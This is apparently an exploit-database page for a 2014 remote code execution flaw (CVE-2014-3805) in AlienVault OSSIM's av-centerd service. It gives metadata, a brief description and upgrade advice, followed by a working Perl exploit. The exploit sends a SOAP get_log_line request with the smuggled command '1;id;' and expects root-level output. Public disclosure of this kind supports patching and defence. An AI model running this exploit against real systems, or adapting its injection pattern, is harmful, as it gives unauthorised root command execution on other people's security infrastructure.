AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution

vendor:

OSSIM

by:

Alfredo Ramirez

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: OSSIM

Affected Version From: < 4.7.0

Affected Version To: < 4.7.0

Patch Exists: YES

Related CWE: CVE-2014-3805

CPE: a:alienvault:ossim

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian/Virtual Appliance

2014

AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution

A vulnerability in AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' allows an attacker to execute arbitrary code remotely. The vulnerability is due to insufficient validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted SOAP request to the vulnerable server. Successful exploitation of this vulnerability can result in arbitrary code execution.

Mitigation:

Upgrade to AlienVault OSSIM version 4.7.0 or later.

Source

Exploit-DB raw data:

# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: < 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805

 #!perl -w

  use SOAP::Lite;

  # SSL is self-signed so we have to ignore verification.
  $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;

  # We simply append the 'id' command to the number of log we want to
  # read.
  @soap_response = SOAP::Lite
    -> uri('AV/CC/Util')
    -> proxy('https://172.26.22.2:40007/av-centerd')
    -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
    -> result;

  for (@{ $soap_response[0] }) {
   print "$_\n";
  }

  # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)